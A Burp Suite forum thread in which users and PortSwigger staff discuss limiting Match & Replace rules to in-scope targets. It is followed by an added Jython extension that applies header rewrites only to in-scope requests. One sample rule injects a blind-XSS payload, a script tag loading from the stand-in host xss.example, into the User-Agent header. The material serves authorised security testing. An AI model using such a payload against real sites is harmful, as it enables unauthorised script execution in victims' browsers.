Burp Suite User Forum


Match & Replace for In-Scope Only

Nadav | Last updated: Dec 03, 2020 10:06AM UTC

Hey, so I've been using Burp Suite as usual, and suddenly, while testing, I noticed that the Match & Replace rules I've created are affecting out-of-scope domains, which makes a huge mess in the whole application instead of only where I need the mess to be. Is there an option to narrow Match & Replace to in-scope targets only? If not, can you add this feature, please? Thanks.

Uthman, PortSwigger Agent | Last updated: Dec 03, 2020 10:45AM UTC

When you configure your scope, there is an option to ignore out of scope requests. Did you select 'Yes' for this? The Match and Replace rules should only apply to requests/responses passing through the Proxy but if you set your scope to block out of scope requests prior to this, you should not see any modification of out of scope requests (since they should not be captured by the proxy). Or do you want to capture out of scope requests but only apply the match and replace rules on in-scope ones?

Nadav | Last updated: Dec 03, 2020 11:24AM UTC

Thanks for the fast reply, Uthman. I set the scope and did click "Yes" in the message. Then I saw the headline that says "Logging out-of-scope Proxy traffic is disabled" with the "Re-enable" button next to it. Despite this, Match & Replace still works on out-of-scope traffic. As far as I'm concerned (I don't want to speak in the name of all the researchers in the world), I'd like to totally ignore out-of-scope traffic: I don't want to see it (which already happens) and I don't want to edit it (unless I choose to specifically). Thanks.

Uthman, PortSwigger Agent | Last updated: Dec 03, 2020 11:28AM UTC

Thanks for the feedback. Do you have any evidence that out of scope traffic is subject to the match and replace rules? If the logging of that traffic is disabled, surely it should not be passing through the proxy. Are you saying that this is not working as intended either? Can you please send us an email with further feedback and screenshots? You can reach us at support@portswigger.net. Thanks a lot for your cooperation!

Nadav | Last updated: Dec 05, 2020 11:45AM UTC

I don't see the traffic of the out-of-scope domains, but yet, the Match & Replace rules affect them. I'll create a video and send it to your email.

Uthman, PortSwigger Agent | Last updated: Dec 07, 2020 08:29AM UTC

Thank you! We will take a look and get back to you directly via email.

mvks | Last updated: Apr 14, 2023 05:37PM UTC

Hi, did you find any solution to this? I have the same problem with Burp Suite Community Edition v2023.3.3 on macOS.

Michelle, PortSwigger Agent | Last updated: Apr 17, 2023 12:07PM UTC

Hi, this is currently the expected behavior, as the requests are passing through Burp Proxy. We have made a note of this idea so we can track how many people would find this useful, and we have added your vote to it. Do you need these to pass through Burp Proxy, or could they be passed straight through using the TLS pass-through settings?

Mazen | Last updated: Jun 27, 2023 09:09AM UTC

I have the same problem with Burp Suite v2022.7.1. Can you please fix it? I test for blind XSS, and I want only the in-scope domain to be affected, not the out-of-scope ones too.

Michelle, PortSwigger Agent | Last updated: Jun 27, 2023 02:32PM UTC

Hi, if you update to the latest version of Burp you'll find an option 'Only apply to in-scope items' under the Match and Replace rules.
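For anyone stuck on a Burp version that predates the 'Only apply to in-scope items' option (such as the 2022.7.1 build mentioned above), the same restriction can be implemented as a small Jython extension: an HTTP listener that checks the request URL against the Suite scope via the legacy extender API's `isInScope` before applying any header rewrites. The following is an added example written for this thread, not code from PortSwigger or from any poster; the `RULES` list (a User-Agent rewrite carrying a placeholder blind-XSS canary on `xss.example`, plus an injected `X-Canary` header) is a constructed sample to swap for your own rules. The `try`/`except` around the `burp` import only lets the pure-Python helper be exercised outside Burp.

```python
# Added example, not PortSwigger's code: Jython extension (legacy Burp extender API)
# that applies match & replace style header rules only to in-scope Proxy requests.
import re

try:
    from burp import IBurpExtender, IHttpListener  # present under Burp's Jython
except ImportError:  # outside Burp: placeholders so apply_header_rules stays importable
    class IBurpExtender(object):
        pass

    class IHttpListener(object):
        pass

# Constructed sample rules: (regex matched against one header line, replacement).
# A replacement containing CRLF yields extra lines, so a rule can add a header too.
RULES = [
    (re.compile(r"^User-Agent: .*$"),
     'User-Agent: Mozilla/5.0 "><script src=https://xss.example/c></script>'),
    (re.compile(r"^(Host: .*)$"),
     r"\1\r\nX-Canary: in-scope-only"),
]


def apply_header_rules(headers, rules=RULES):
    """Return a new list of header lines with every rule applied to each line.

    headers: list of str, request line first, as IRequestInfo.getHeaders() returns
    them. Rules run in order on each line; CRLF in a result splits into new lines.
    """
    out = []
    for line in headers:
        line = str(line)  # Jython hands back java.lang.String objects
        for pattern, repl in rules:
            line = pattern.sub(repl, line)
        out.extend(line.split("\r\n"))
    return out


class BurpExtender(IBurpExtender, IHttpListener):
    def registerExtenderCallbacks(self, callbacks):
        self._cb = callbacks
        self._helpers = callbacks.getHelpers()
        callbacks.setExtensionName("In-scope-only match & replace (example)")
        callbacks.registerHttpListener(self)

    def processHttpMessage(self, toolFlag, messageIsRequest, messageInfo):
        # Rewrite requests only, and only those flowing through the Proxy tool
        if not messageIsRequest or toolFlag != self._cb.TOOL_PROXY:
            return
        info = self._helpers.analyzeRequest(messageInfo)
        # The check this thread asks for: leave out-of-scope hosts untouched
        if not self._cb.isInScope(info.getUrl()):
            return
        headers = apply_header_rules(list(info.getHeaders()))
        body = messageInfo.getRequest()[info.getBodyOffset():]
        messageInfo.setRequest(self._helpers.buildHttpMessage(headers, body))
```

Load it from Extender > Extensions with a Jython standalone JAR configured, and define the scope under Target > Scope; because the scope check happens before any rewrite, out-of-scope requests (and anything you route around the Proxy with TLS pass-through, as Michelle suggests) are never modified.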
